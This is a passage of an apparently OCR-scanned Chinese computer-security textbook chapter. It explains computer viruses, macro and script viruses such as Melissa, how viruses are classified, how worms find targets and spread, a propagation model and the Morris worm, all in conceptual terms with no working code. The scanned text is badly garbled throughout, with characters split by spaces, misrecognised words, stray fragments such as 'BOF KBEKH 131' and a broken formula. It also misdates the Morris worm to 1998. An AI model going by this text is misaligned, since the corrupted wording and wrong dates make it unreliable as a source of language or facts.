恶意 软件 的 第 一 种 传播 类 型 涉及 软件 片段 的 寄生 ， 它 们 将 自身 依附 于 一 些 现 有 的 可 执行 
内 容 中 。 这 些 软 件 片 段 可 以 是 感染 应 用 程序 、 实 用 程序 或 者 系统 程序 的 机 器 代码 ， 甚 至 是 用 于 
引导 局 动 计算 机 系统 的 代码 。 早 期 个 人 计算 机 时 代 ， 计 算 机 病毒 感染 占 恶意 代码 的 主要 部 分 。 
“计算 机 病毒 ”一 词 仍然 经 党 被 用 来 泛 指 恶意 软件 ， 而 不 仅仅 是 计算 机 病毒 。 最 近 ， 软 件 片 
段 出 现 了 脚本 语言 代码 ， 脚 本 语言 通常 用 于 支持 数据 文件 中 的 活动 内 容 ， 如 微软 Word 文档 、 
Excel 电子 表格 和 Adobe PDF 文档 。 


6.3.1 ”病毒 的 性 质 


计算 机 病毒 是 一 种 通过 修改 正常 程序 而 进行 感染 的 软件 。 这 种 修改 包括 向 正常 程序 注入 病 
毒 代码 来 使 病毒 程序 得 到 复制 ， 这 样 就 能 继续 感染 其 他 正常 程序 。 计 算 机 病毒 最 早出 现在 20 
世纪 80 年 代 早 期 ， 而 术语 本 身 是 由 Fred Cohen 于 1983 提出 的 ， 他 所 著 的 一 本 书 在 这 个 领域 
起 到 了 葛 基 作用 [COHE94]。Brain 病毒 首次 发 现 于 1986 年 ， 是 第 一 个 以 MSDOS 系统 为 目标 
的 病毒 ， 在 当时 感染 了 海量 的 计算 机 。 

生物 学 意义 上 的 病毒 是 一 种 微小 的 基因 代码 片 ( DNA 或 RNA)， 它 能 控制 活 细胞 的 机 能 ， 
使 之 生成 成 千 上 万 的 病毒 拷贝 。 计 算 机 病毒 与 生物 病毒 相似 ， 它 能 通过 其 自身 携带 的 病毒 代码 
进行 完全 的 自我 复制 。 典 型 的 病毒 会 将 恶意 代码 插入 正常 程序 中 。 这 样 ， 一 旦 被 感染 的 计算 机 
与 未 被 感染 的 软件 交互 ， 病 毒 的 一 个 拷贝 就 会 感染 新 的 程序 。 因 此 ， 病 毒 就 通过 互相 信任 的 用 
户 之 间 的 磁盘 、U 盘 或 网 络 交换 数据 而 在 计算 机 之 间 传 播 开 来 。 在 网 络 环境 下 ， 访 问 其 他 计算 
机 上 的 文档 、 应 用 程序 和 系统 服务 的 能 力 为 病毒 的 传播 提供 了 温床 。 

病毒 可 以 实现 正常 程序 所 能 实现 的 任何 功能 ， 它 能 够 跟着 宿主 程序 的 运行 而 悄悄 地 运行 。 
一 旦 病毒 执行 ， 它 能 够 实现 任何 功能 ， 如 删除 文件 和 程序 ， 这 些 行为 都 是 当前 用 户 权 限 所 允许 
的 。 在 早 些 年 间 ， 病 毒 统治 恶意 软件 领域 的 一 个 原因 是 个 人 计算 机 系统 缺少 对 用 户 身份 的 认证 
和 访问 控制 。 如 此 ， 病 毒 可 以 感染 系统 中 任何 一 个 可 执行 程序 。 大 量 的 程序 共享 在 软磁盘 上 也 
会 令 病毒 较 容 易 地 传播 ， 尽 管 速度 可 能 较 慢 。 含 有 严格 访问 控制 的 现代 操作 系统 显著 地 阻碍 了 
传统 的 、 机 器 可 执行 代码 形式 的 病毒 的 感染 。 这 导致 了 宏 病毒 这 一 利用 某 些 文档 格式 (如 MS 
Word 文档 、Excel 电子 表格 和 Adobe PDF 文件 等 ) 所 支持 的 活动 内 容 的 新 型 病毒 的 出 现 。 作 为 
用 户 正 第 系统 使 用 的 一 部 分 ， 这 些 文档 很 容易 被 修改 和 共享 ， 并且 不 受 与 程序 相同 的 访问 控件 
的 保护 。 当 前 ,病毒 感染 的 方式 通常 是 几 种 现代 恶意 软件 使 用 的 传染 方式 中 的 一 种 ， 其 他 的 方 
式 则 包括 了 蠕虫 和 木马 等 。 

[AYCO06] 阐述 了 一 个 计算 机 病毒 的 三 个 组 成 部 分 。 更 普遍 地 讲 ， 很 多 现代 的 恶意 软件 也 


BOF KBEKH 131 


包含 了 以 下 一 种 或 多 种 组 成 元 素 。 
o 感染 机 制 (infection mechanism): 是 指 病毒 传播 和 进行 自我 复制 的 方法 。 感 染 机 制 也 被 
称 为 感染 向 量 (infection vector). 
© 触发 条 件 (trigger) : 是 指 激 活 或 交付 病毒 有 效 载荷 的 事件 或 条 件 ， 有 时 被 称 为 逻辑 炸 
弹 (logic bomb). 
e 有 效 载荷 (payload) : mR. Aa Tee, thal 
能 包括 无 破坏 但 值得 注意 的 良性 活动 。 
在 其 生命 周期 中 ，— 典 型 的 病毒 一 般 会 经 历 下 面 4 个 阶段 : 
© 潜伏 阶段 ( dormant phase): 病毒 处 于 休眠 状态。 最 后 病毒 会 被 某 些 事件 激活 ， 例 如 日 
期 、 某 个 程序 或 文件 的 出 现 或 者 磁盘 的 容量 超过 某 个 限制 等 。 并 不 是 所 有 的 病毒 都 有 
这 个 阶段 。 
© 传播 阶段 ( propagation phase) :病毒 将 自身 的 拷贝 插入 其 他 程序 或 硬盘 上 某 个 与 系统 
相关 的 区 域 。 这 个 拷贝 也 许 会 和 原始 版 本 不 完全 一 样 ， 病 毒 经 常 通过 变异 来 逃避 检测 。 
每 个 被 感染 的 程序 都 包含 病毒 的 一 个 拷贝 ， 而 且 这 些 拷贝 也 会 自己 进入 传播 阶段 。 
e 触发 阶段 (triggering phase): 病毒 被 激活 以 执行 其 预先 设 定 的 功能 。 和 潜伏 阶段 一 样 ， 
病毒 进入 触发 阶段 可 以 由 多 种 系统 事件 引起 ， 包 括 病 毒 自 身 复制 的 次 数 。 
© 执行 阶段 (execution phase): 执行 病毒 功能 。 有 的 功能 是 无 害 的 ， 例 如 在 屏幕 上 显示 一 
个 信息 ， 有 些 则 是 破坏 性 的 ， 例 如 破坏 程序 和 数据 文件 。 
多 数 病 毒 是 基于 某 一 特定 的 操作 系统 以 某 种 特定 的 方式 执行 的 ， 在 某 些 情况 下 ， 还 可 能 针 
对 某 个 特定 的 硬件 平台 。 因 此 ， 它 们 在 设计 时 都 会 利用 这 些 特定 系统 的 细节 和 漏洞 。 但 是 宏 病 
毒 是 针对 文档 类 的 文件 的 ， 稼 文 持 在 多 种 系统 中 运行 。 
一 旦 病毒 通过 感染 一 个 程序 进入 系统 ， 它 就 可 以 在 被 感染 的 程序 执行 时 潜在 地 感染 该 系 
统 上 的 某 些 或 所 有 其 他 文件 ， 但 这 取决 于 受 感染 程序 的 访问 权限 。 因 此 ， 可 以 通过 完全 阻止 病 
毒 进 入 来 预防 病毒 感染 。 不 幸 的 是 ， 预 防 是 非常 困难 的 ， 病 毒 可 以 是 系统 之 外 任何 程序 的 一 部 
分 。 因 此 ， 除 非 有 人 愿意 从 零 开 始 写 出 自己 的 系统 和 应 用 程序 ， 否 则 还 是 容易 受到 攻击 。 拒 绝 
正常 用 户 修改 系统 程序 的 权限 也 可 以 阻止 许多 形式 的 感染 。 


6.3.2 ” 宏 病 毒 和 脚本 病毒 


在 20 世纪 90 年 代 中 期 宏和 脚本 代码 病毒 发 展 为 最 流行 的 病毒 种 类 。NISTIR 7298 ( 关 
键 信息 安全 术语 表 ，2013 年 5 月 ) 将 宏 病毒 定义 为 一 种 病毒 ， 其 附加 到 文档 并 使 用 文档 应 用 程 
序 的 宏 编 程 功能 来 执行 和 传播 。 宏 病毒 会 感染 用 于 支持 各 种 用 户 文 档 类 型 的 活动 内 容 的 脚本 代 
码 。 宏 病毒 的 威胁 性 主要 有 以 下 几 个 原因 : 

1. 宏 病 毒 有 独立 的 平台 。 许 多 宏 病 毒 感染 和 常用 应 用 程序 的 活动 内 容 ， 比 如 微软 Word 文件 
或 其 他 微软 办 公文 件 ， 或 者 Adobe PDF 文档 中 的 脚本 代码 。 任何 支持 这 些 应 用 程序 的 硬件 于 
台 或 操作 系统 都 可 能 会 被 感染 。 

2. 宏 病 毒 感染 的 是 文档 而 不 是 可 执行 部 分 的 代码 。 大 多 数 关 于 计算 机 系统 的 信息 是 以 文档 
的 形式 (而 不 是 程序 的 形式 ) 存在 。 

3. 宏 病 毒 的 传播 很 容易 ， 因 为 它们 所 利用 的 文档 通常 是 共享 使 用 的 。 一 个 很 常见 的 方法 是 
通过 电子 邮件 ， 因 为 这 些 文档 有 时 会 不 提示 用 户 而 直接 打开 。 

4. 宏 病 毒 感染 的 是 用 户 文 档 而 不 是 系统 程序 ， 所 以 传统 文件 系统 的 访问 控制 在 防止 其 扩散 
方面 的 作用 有 限 ， 因 为 用 户 需 要 修改 它们 。 

5. 相 比 于 传统 的 可 执行 病毒 ， 宏 病毒 的 制造 或 修改 更 加 人 简单。 
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内 容 、 表 单 验 证 以 及 其 他 和 这 些 文档 有 关 的 有 用 的 任务 。 

微软 Word 和 Excel 文档 因 其 被 广泛 传播 使 用 而 成 为 最 常见 的 目标 。 微 软 Office 产品 的 相 
继 发 布 提供 了 更 多 针对 宏 病 毒 的 保护 。 例 如 ， 微 软 提 供 了 一 个 可 供 选 择 的 宏 病毒 检测 保护 工 
具 ， 其 能 够 筛选 出 可 疑 单 词 并 通知 客户 打开 含有 宏 病 毒 文件 的 潜在 风险 。 通 过 允许 宏 由 其 作者 
进行 数字 签名 并 将 作者 列 为 可 信 ，Office 2000 改进 了 宏 安 全 性 。 如 果 正 在 打开 的 文档 包含 未 签 
名 或 已 签名 但 不 可 信和 的 宏 ， 那么 用 户 会 得 到 警告 ， 并 且 建 议 在 此 情况 下 禁用 宏 。 各 种 反 病 毒 产 
品 供应 商 也 开发 了 检测 和 清除 宏 病 毒 的 工具 。 与 其 他 类 型 的 恶意 软件 一 样 ，( 攻 击 者 与 防御 者 
双方 的 ) 竞争 在 宏 病 毒 领 域 继续 存在 ， 但 它们 不 再 是 主要 的 恶意 软件 威胁 。 

宏 病毒 式 恶 意 软 件 的 另 一 个 可 能 的 宿主 是 Adobe 的 PDF 文档 。 其 可 以 支持 一 系列 符 人 式 
组 件 ， 包 括 JavaScript 和 其 他 类 型 的 脚本 代码 。 尽 管 最 近 的 PDF 阅读 需 包 含 了 在 运行 此 类 代码 
时 警告 用 户 的 措施 ， 但 是 恶意 软件 可 以 操纵 用 户 显示 的 消息 来 诱 使 他 们 允许 其 执行 。 如 果 发 生 
这 种 情况 ， 代 码 可 能 会 充当 病毒 来 感染 用 户 可 以 在 其 系统 上 访问 的 其 他 PDF 文档 。 或者, C 
们 还 可 以 安装 一 个 木马 或 者 装扮 成 蠕虫 ， 稍 后 我 们 将 继续 讨论 [STEV11]。 

宏 病 毒 结 构 ”虽然 宏 语 言 可 能 具有 类 似 的 语法 ,但 细节 取决 于 解释 宏 的 应 用 程序 ， 因 此 
宏 语 言 始 终 针 对 特定 应 用 程序 的 文档 。 例 如 ， 一 个 微软 Word 宏 (其 包括 一 个 宏 病 毒 ) 与 一 个 
Excel 宏 是 不 一 样 的 。 宏 可 以 保存 为 文档 ,或 者 保存 在 全 局 模板 或 工作 表 中 。 当 某 些 确定 动作 
发 生 时 ， 宏 会 自动 运行 。 比 如 ， 在 微软 Word 文档 中 ， 宏 可 以 在 Word 启动 、 文 档 打 开 、 新 文 
档 创 建 或 文档 关闭 时 运行 。 宏 可 以 执行 广泛 的 操作 ， 不 仅仅 是 在 文档 内 容 上 ， 其 可 以 读 写 文 
件 ， 或 者 唤醒 其 他 应 用 。 

有 一 个 宏 病 毒 执行 操作 的 例子 一 一 Melissa 宏 病毒 ， 它 的 伪 代 码 如 图 6-1 所 示 。 这 是 
Melissa 邮件 蠕虫 的 一 个 组 件 ， 其 他 部 分 将 会 在 下 一 节 进 一 步 描述 。 该 代码 将 通过 打开 受 感 
染 的 Word 文档 〈 很 可 能 是 通过 电子 邮件 发 送 的 ) 而 引入 系统 。 这 个 宏 代 码 包 含 在 Document 
Open 宏 中 ， 其 可 以 在 文档 被 打开 时 自动 运行 。 它 首先 禁用 宏 菜单 和 一 些 相关 的 安全 功能 ,使 
用 户 更 难 停 止 或 删除 其 操作 。 接 下 来 检查 它 是 否 从 受 感 染 的 文档 运行 ， 如 果 是 ， 则 将 其 自身 复 
制 到 全 局 模板 文件 中 。 随 后 每 一 个 文档 都 会 打开 该 文件 ， 继 而 运行 宏 病毒 ， 受 到 感染 。 然 后 
Melissa 病毒 检查 它 是 否 已 经 在 此 系统 上 运行 过 ， 这 是 通过 查看 是 否 已 将 特定 密 铀 “Melissa ” 
添加 到 注册 表 中 来 完成 的 。 如 果 该 密 钥 不 存在 ， 并 且 Outlook 是 电子 邮件 客户 端 ， 则 宏 病 
毒 会 将 当前 受 感染 文档 的 副本 发 送 到 当前 用 户 的 地 址 竹中 的 前 50 个 地 址 。 然 后 其 会 创建 
“Melissa ”注册 表 项 ， 这 样 这 一 步 在 任何 系统 上 都 只 需 执 行 一 次 。 最 后 ， 它 会 检查 当前 时 间 和 
日 期 是 否 存在 特定 的 触发 条 件 ， 如 果 符 合 ， 那 么 Simpson quote 会 插入 到 当前 文档 中 。 一 旦 宏 
病毒 代码 完成 ， 文 档 继续 打开 ， 使 用 者 可 以 正常 编辑 。 此 代码 说 明 宏 病毒 如 何 操作 文档 内 容 以 
及 访问 系统 上 的 其 他 应 用 程序 。 它 还 显示 了 两 种 感染 机 制 ， 第 一 种 感染 在 系统 上 打开 的 每 个 后 
续 文 档 ， 第 二 种 通过 电子 邮件 将 感染 文档 发 送 给 其 他 用 户 。 

更 多 复杂 的 宏 病毒 代 码 可 以 使 用 保密 技术 ， 比 如 加 密 或 多 态 化 ， 每 次 都 改变 其 外 观 以 避免 
扫描 探测 。 


6.3.3 ”病毒 的 分 类 


自 病 毒 问世 以 来 ， 病 毒 制 造 者 和 反 病 毒 软件 开发 者 之 间 的 较量 就 从 未 停止 过 。 当 新 的 有 效 
的 反 病 毒 技 术 出 现 后 ， 新 的 病毒 技术 也 会 随 之 出 现 。 现 在 没有 一 种 简单 或 者 被 广泛 认可 的 病毒 
分 类 方法 。 本 节 ， 我 们 参照 文献 [AYCO06] 沿 着 两 个 相互 垂直 的 方向 来 对 病毒 进行 分 类 : 一 是 
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病毒 试图 感染 的 对 象 的 类 型 ;二 是 病毒 躲避 用 户 和 反 病 毒 软 件 检测 的 方法 。 
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图 6-1 Melissa 宏 病毒 伪 代 码 


依照 目标 进行 分 类 的 病毒 有 以 下 几 种 : 

e 感染 引导 扇 区 病毒 boot sector infector) : 感染 主 引 导 记 录 或 引导 记录 ， 当 系统 从 含有 
这 类 病毒 的 磁盘 上 启动 时 病毒 就 开始 传播 。 

e 感染 可 执行 文件 病毒 (file infector): 感染 可 以 在 操作 系统 或 shell 中 执行 的 文件 。 

© 宏 病 毒 (macro virus): 感染 含有 由 应 用 程序 解释 的 可 执行 宏 代 码 或 脚本 语言 的 文件 。 

e 多 元 复合 型 病毒 (multipartite virus): 多 种 途径 感染 文件 。 通 常情 况 下 ， 多 元 复合 型 病 
毒 可 以 感染 多 种 类 型 的 文件 ， 因 此 需要 处 理 所 有 可 能 感染 的 部 位 才能 根除 该 种 病毒 。 

以 下 按 病 毒 的 隐藏 方式 进行 分 类 : 

e 加 密 型 病毒 (encrypted virus): 典型 的 加 密 方法 是 ， 先 通过 部 分 病毒 代码 生成 一 个 随机 

的 密 钥 ， 然 后 用 密 钥 加 密 其 余部 分 。 密 钥 保存 在 病毒 代码 中 。 当 被 感染 的 程序 执行 时 ， 

先 要 使 用 这 个 随机 密 钥 解密 被 加 密 部 分 。 在 感染 过 程 中 病毒 会 重新 生成 随机 密 钥 。 因 

为 对 每 一 个 病毒 实例 都 使 用 不 同 的 密 钥 进行 加 密 ， 所 以 在 病毒 代码 中 很 难 找到 用 于 模 

式 匹 配 的 固定 字 节 。 

隐蔽 型 病毒 〈stealth virus): 这 种 病毒 的 设计 目的 就 是 躲避 反 病 毒 软件 的 检测 ， 因 此 它 

不 仅仅 隐藏 有 效 载荷 部 分 的 病毒 代码 ， 而 是 将 病毒 整体 进行 隐藏 。 一 般 通 过 代码 的 多 

态 、 压 缩 或 者 rootkit 技术 实现 隐藏 。 

多 态 病毒 ( polymorphic virus): 为 了 防止 被 其 他 程序 检测 到 ， 一 种 在 自我 复制 时 生成 

功能 相同 但 位 排列 方式 完全 不 同 的 拷贝 的 病毒 。 在 这 种 情况 下 ， 每 种 病毒 拷贝 的 “ 特 

征 码 ”都 不 尽 相 同 。 为 了 达到 这 个 目的 ， 多 态 病毒 可 能 随机 插入 元 余 指 令 或 者 交换 独 

立 指令 的 顺序 。 更 有 效 的 方法 是 使 用 加 密 。 加 密 病 毒 的 策略 如 下 : 病毒 代码 中 负责 生 

成 密 钥 和 执行 加 密 / 解密 的 部 分 称 为 变形 引擎 (mutation engine)。 这 个 变形 引擎 本 身 在 

每 一 次 执行 过 程 中 也 会 发 生 改变 。 

变形 病毒 (metamorphic virus); 与 多 态 病毒 一 样 ， 每 次 感染 病毒 都 发 生变 异 。 不 同 的 是 

变形 病毒 在 每 次 变异 中 都 重 写 病毒 体 ， 因 此 增加 病毒 检测 的 难度 。 变 形 病 毒 每 次 变异 

并 不 仅仅 改变 病毒 代码 的 组 织 形式 ， 而 是 病毒 行为 也 改变 了 。 
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6.4 传播 - 漏洞 利用 - 蠕虫 


恶意 软件 的 男 一 种 传播 类 型 涉及 软件 漏洞 利用 (这些 漏 洞 我 们 将 会 在 第 10 章 和 第 11 章 中 
讨论 )， 而 计算 机 蠕虫 通常 会 利用 这 些 漏 洞 。 肾 虫 是 一 种 主动 寻找 并 感染 其 他 机 天 的 程序 ， 而 
每 台 被 感染 机 器 又 转 而 成 为 自动 攻击 其 他 机 器 的 跳板 。 蠕 虫 利用 存在 于 客户 端 或 服务 器 程序 中 
的 漏洞 来 获取 每 个 新 系统 的 权限 ， 利 用 网 络 连 接 在 系统 间 传 播 ， 也 能 通过 共享 媒介 (如 USB 
设备 或 者 CD 、DVD 数据 光盘 ) 进行 传播 。 电 子 邮件 蠕虫 通过 附带 的 文档 或 即时 消息 通信 中 的 
宏 或 脚本 代码 传播 。 一 旦 被 激活 ， 里 虫 就 可 以 再 次 复制 并 传播 。 除 了 传播 之 外 ， 蠕 虫 通常 还 会 
附 审 其 他 的 一 些 有 效 载荷 ， 这 些 我 们 将 在 后 面 讨 论 。 

计算 机 蠕虫 的 概念 来 自 John Brunner 在 1975 年 写 的 科幻 小 说 《 The Shockwave Rider 》。 
第 一 个 著名 的 蠕虫 程序 是 20 世纪 80 年 代 早 期 在 Xerox Palo Alto 实验 室 中 实现 的 。 这 个 蠕虫 程 
序 是 无 恶意 的 ， 它 被 用 来 寻找 空闲 的 系统 去 运行 计算 密集 型 的 任务 。 

为 了 复制 自身 ， 蠕 虫 利 用 一 些 方法 来 访问 远程 系统 。 这 些 方法 如 下 〈 其 中 大 部 分 方法 现在 
仍然 很 常见 ): 

e 电子 邮件 或 即时 通信 工具 : 蠕虫 通过 邮件 将 自己 的 拷贝 发 送 到 其 他 系统 中 去 ,或 者 将 

自身 当 作 即时 通信 服务 的 附件 进行 发 送 。 当 打开 或 浏览 电子 邮件 或 附件 时 ,蠕虫 的 代 
码 就 会 被 执行 了 。 

e 文件 共享 : 蠕虫 可 以 在 如 USB 设备 等 可 插 拔 媒介 上 创建 自己 的 拷贝 ， 或 像 病 毒 那样 感染 
此 类 媒介 上 适合 的 文件 。 当 设备 通过 自动 运行 机 制 连接 至 其 他 系统 时 ,蠕虫 可 以 借助 软 
件 中 的 漏洞 执行 ; 或 者 ， 当 用 户 在 目标 系统 上 打开 被 感染 文件 时 ， 蠕 虫 也 将 借 机 执行 。 

e 远程 执行 能 力 : 蠕虫 有 在 其 他 系统 中 执行 目 己 的 拷贝 的 能 力 ; 一 般 是 使 用 显 式 的 远程 
执行 工具 ， 或 者 利用 网 络 服务 中 的 程序 缺陷 来 破坏 操作 ( 像 我 们 在 第 10 BEA 11 章 讨 
论 的 那样 )。 

e 远程 文件 访问 或 传输 能 力 : 蠕虫 利用 远程 文件 访问 或 者 传输 服务 向 其 他 系统 复制 自身 

拷贝 ， 该 系统 的 用 户 此 后 便 有 可 能 执行 它 。 

e 远程 登录 能 力 : 蠕虫 以 一 个 用 户 的 身份 登录 到 远程 系统 ， 然 后 使 用 命令 将 自己 复制 到 

将 要 被 执行 的 另 一 个 系统 中 。 

然后 ， 新 复制 的 蠕虫 程序 在 远程 系统 中 运行 ， 除 了 在 该 系统 中 完成 的 任何 功能 之 外 ， 它 还 
会 以 相同 的 方式 继续 传播 。 

蠕虫 显示 出 与 计算 机 病毒 相同 的 特征 ， 它 具有 下 面 几 个 阶段 : 潜伏 阶段 、 传 播 阶 段 、 触 发 
阶段 和 执行 阶段 。 在 传播 阶段 主要 执行 如 下 功能 : 

e 通过 检查 主机 列表 、 地 址 库 、 好 友 名 单 、 可 信和 节点 或 其 他 可 以 获取 远程 系统 权限 的 细 

节 ， 扫 描 可 能 的 目标 主机 地 址 ， 或 搜寻 合适 的 可 移动 设备 ， 寻 找 合适 的 访问 控制 机 制 。 

e 通过 访问 控制 机 制 将 自己 复制 到 远程 主机 上 ， 并 使 该 拷贝 运行 。 

里 虫 在 复制 自己 到 远程 主机 前 ， 可 能 会 先 检 查 该 系统 是 否 已 经 被 感染 。 在 多 进程 系统 中 ， 
蠕虫 通过 把 自己 命名 为 系统 进程 或 者 其 他 不 被 系统 操作 员 注 意 的 名 字 来 伪装 自己 。 更 新 型 的 蠕 
虫 甚至 能 将 自身 的 代码 注入 系统 中 已 经 存在 的 进程 里 ， 并 以 该 进程 中 的 一 个 额外 的 线程 的 形式 
运行 ， 以 此 进一步 隐藏 自身 。 


6.4.1 发 现 目标 


网 络 蠕虫 在 传播 阶段 的 首要 功能 是 寻找 其 他 系统 进行 感染 ， 这 个 过 程 可 以 叫 作 扫 描 ( scanning) 
或 指纹 采集 ( fingerprinting)。 对 使 用 远程 访问 的 网 络 服务 来 攻击 软件 漏洞 的 蠕虫 而 言 ， 它 必须 
先 明确 找 出 潜在 的 运行 有 易 感 染 服 务 的 系统 ， 然 后 再 进行 感染 。 此 后 ， 通 常 来 说 ,已 经 安装 在 
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文献 [MIRK04] 列 出 了 蠕虫 使 用 的 网 络 地 址 扫描 方式 : 

e 随机 式 探索 ;每 一 台 被 感染 的 主机 使 用 不 同 的 种 子 来 探测 IP 地 址 空间 的 随机 地 址 。 该 
技术 会 产生 大 量 的 网 络 流量 ， 可 能 导致 在 实际 攻击 开展 前 ， 操 作 便 会 被 中 断 。 

© 黑 名 单 : 攻击 者 首先 为 潜在 的 易 感染 机 器 列 出 一 个 大 名 单 。 这 是 一 个 需要 花费 大 量 时 
间 ， 非 常 慢 的 过 程 ， 可 以 避免 被 检测 到 攻击 正在 进行 。 一 旦 名 单 编辑 完成 ， 攻 击 者 即 
开始 感染 和 名单 中 的 机 器 。 每 个 被 感染 的 机 需 会 被 分 配 名 单 中 的 一 部 分 进行 扫描 。 这 种 
策略 会 使 得 扫描 时 间 非 常 短 ， 因 此 检测 感染 的 发 生 是 非常 困难 的 。 

e 拓扑 式 探索 : 该 方法 利用 被 感染 机 器 中 所 包含 的 信息 来 寻找 和 扫描 更 多 的 主机 ，。 

e 本 地 子 网 : 如 果 防 火 墙 后 的 一 台 主 机 可 以 被 感染 ， 则 该 主机 会 在 其 所 在 的 本 地 网 络 中 寻找 
目标 。 利 用 子 网 地 址 结构 ， 被 感染 的 主机 可 以 寻找 到 其 他 本 应 受到 防火 墙 保护 的 主机 。 


6.4.2 ”蠕虫 传播 模型 


一 个 设计 巧妙 的 蠕虫 可 以 非常 快 地 传染 大 量 的 主机 。 有 必要 建立 一 个 通用 的 蠕虫 传播 率 的 
模型 。 计 算 机 病毒 和 蠕虫 表现 出 与 生物 学 病毒 相仿 的 自我 复制 和 传播 行为 。 因 此 ， 我 们 可 以 依 
徘 经 典 的 传染 模型 来 理解 计算 机 病毒 和 蠕虫 的 传播 行为 。 简 要 来 说 ,经典 的 传染 模型 可 以 用 下 
面 的 公式 表示 : 


I(t) _ 
“= POSO 


Hp: 77D)= 在 时 间 1 内 被 感染 的 个 体 数 量 
SG 三 在 时 间 上 内 易 感 染 个 体 数量 ( 易 感 染 但 是 并 未 被 感染 ) 
p= 感染 率 
N= 二 总 个 体 数 量 ，N==1(?) 十 S(2) 
图 6-2 显示 了 一 组 典型 参数 集 的 动态 变化 情况 。 蠕 虫 的 传播 经 过 了 3 个 阶段 。 在 初始 阶 

段 ， 被 感染 主机 的 数量 按 指数 方式 增长 。 这 种 增长 方式 的 原因 我 们 可 以 用 一 个 简化 的 情况 来 解 
释 ， 当 一 个 蠕虫 激活 后 ， 它 感染 了 附近 的 两 台 主 机 ， 每 台 被 感染 的 主机 又 分 别 感 染 了 另外 两 台 
主机 ， 然 后 以 这 种 方式 继续 感染 ， 结 果 就 呈现 出 指数 增长 。 一 段 时 间 之 后 ， 被 感染 的 主机 在 攻 
击 已 经 被 感染 的 主机 上 浪费 了 一 些 时 间 ， 从 而 使 感染 率 降 低 了 。 在 这 个 中 间 阶 段 ， 感染 的 主机 
数 近 似 于 线性 增长 ， 但 是 这 个 阶段 的 感染 率 是 最 快 的 。 当 大 部 分 脆弱 的 主机 被 感染 后 ， 攻 击 就 
进入 了 缓慢 结束 期 ， 在 这 一 阶段 蠕虫 要 寻找 那些 很 难 被 识别 出 来 的 剩余 主机 。 
缓慢 的 开始 阶段 快速 的 传播 阶段 缓慢 的 结束 阶段 






SNT. 时 间 i4 
图 6-2 ”蠕虫 传播 模型 
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显然 ， 反 蠕虫 的 目标 应 该 是 在 慢 启动 阶段 捕获 蠕虫 ， 因 为 那 时 只 有 少量 的 主机 被 感染 。 

基于 对 当时 蠕虫 攻击 的 分 析 ， 文献 [ZOU05] 描述 了 一 个 蠕虫 传播 模型 。 蠕 虫 的 传播 速度 
和 感染 主机 的 数量 取决 于 许多 因素 ， 其 中 包括 传播 模式 、 所 利用 的 漏洞 ， 以 及 与 现 有 攻击 的 相 
似 度 。 由 于 有 最 后 一 个 因素 ， 相 比 一 个 全 新 的 攻击 ， 现 有 攻击 的 某 个 变种 能 够 被 更 有 效 地 阻 
止 。 文 献 [ZOU05] 描述 的 模型 与 图 6-2 所 述 的 蠕虫 传播 模型 基本 吻合 。 


6.4.3 Morris 蠕虫 


可 以 认为 ， 直 到 新 一 代 蠕 虫 产生 之 前 ， 蠕 虫 中 最 为 人 们 所 熟知 的 还 是 1998 年 由 Robert 
Morris 所 编写 并 发 布 到 Internet 上 的 Morris 蠕虫 [ORMA03]。Morris 蠕虫 是 为 了 在 UNIX 系统 
中 传播 而 设计 的 ， 它 使 用 了 多 种 不 同 的 技术 来 传播 。 当 蠕虫 的 某 个 拷贝 执行 时 ， 其 首要 任务 就 
是 找到 从 当前 主机 所 能 进入 的 其 他 主机 。Morris 蠕虫 是 通过 检查 主机 中 的 各 种 目录 列表 和 系统 
表 来 完成 该 任务 的 ， 其 中 包括 : 当前 系统 所 信任 的 主机 表 、 用 户 的 邮件 转发 文件 、 远 程 账 户 访 
问 权 限 表 和 网 络 连 接 状 态 报告 程序 。 对 于 每 一 台 找 到 的 主机 ，Morris 蠕虫 会 尝试 多 种 方法 以 获 
得 访问 权 : 

1. Morris 肾 虫 试图 以 合法 用 户 的 身份 登录 远程 主机 。 在 这 种 方法 中 ， 首 先 ， 蠕 虫 会 试图 破 
解 本 地 口令 文件 。 然 后 ， 利 用 破解 得 到 的 口令 和 对 应 用 户 ID 登录 远程 主机 。 该 方法 的 前 提 是 
许多 用 户 在 不 同系 统 中 使 用 相同 的 口令 。 为 了 得 到 用 户 的 口令 ,蠕虫 执行 口令 破解 程序 ， 尝 试 
用 以 下 字符 串 作 为 口令 : 

a. 每 个 用 户 的 账户 名 和 账户 名 中 字母 的 简单 排列 。 
b. 内 置 的 432 个 Morris 认为 可 能 的 候选 口令 9 。 
c. 本 地 系统 字典 中 的 所 有 单词 。 

2. 利用 UNIX 系统 finger 协议 的 漏洞 ， 这 个 漏洞 会 报告 还 程 用 户 的 位 置 。 

3. 利 用 负责 收发 邮件 的 远程 进程 的 调试 选项 中 的 一 个 陷 门 。 

如 果 上 面 所 提 到 的 这 些 攻击 中 有 任何 一 个 成 功 ，Morris 蠕虫 病毒 就 能 够 和 操作 系统 命令 
解释 器 进行 通信 。 它 会 向 该 命令 解释 器 发 送 一 个 简短 的 引导 程序 ， 并 发 出 一 个 命令 来 执行 该 程 
序 ， 然 后 注销 登录 。 然 后 引导 程序 回调 父 程序 并 下 载 蠕虫 的 其 余部 分 。 这 样 新 的 晴 虫 就 可 以 执 
AT So 
6.4.4 ”蠕虫 攻击 简 史 


1998 年 出 现 的 “Melissa ”电子 邮件 蠕虫 是 第 一 代 同 时 含有 病毒 、 晴 虫 和 木马 的 恶意 软件 
[CASS01]。 其 将 微软 Word 宏 病毒 内 人 电子 邮件 的 附件 中 。 一 旦 接收 者 打开 电子 邮件 的 附件 ， 
宏 病 毒 就 会 被 激活 。 接 着 : 

1. 像 蠕虫 的 传播 方式 一 样 ， 其 将 自己 发 送 给 用 户 电 子 邮 件 地 址 短 中 的 所 有 人 ; 

2. 像 病 毒 的 传播 方式 一 样 ， 损 害 用 户 系统 ， 包 括 令 一 些 安全 软件 失效 和 拷贝 自身 到 其 他 文 
档 中 ; 

3. 每 到 一 个 触发 时 间 ， 它 就 播放 《辛普森 一 家 》 中 的 一 句 台 词 。 

在 1999 年 ， 这 种 电子 邮件 病毒 产生 了 一 个 更 具 破 坏 性 的 版 本 。 新 版 本 并 不 需要 用 户 打 
开 电 子 邮 件 的 附件 ， 只 要 用 户 浏览 邮件 就 会 激活 病毒 。 这 种 病毒 利用 了 电子 邮件 程序 文 持 的 
Visual Basic 脚本 语言 。 

Melissa 蠕虫 只 要 被 激活 〈 无 论 是 通过 打开 电子 邮件 的 附件 还 是 仅 浏 览 电子 邮件 )， 马 上 就 


CO ”本 书 的 Web 站 点 上 提供 了 完整 的 列表 。 
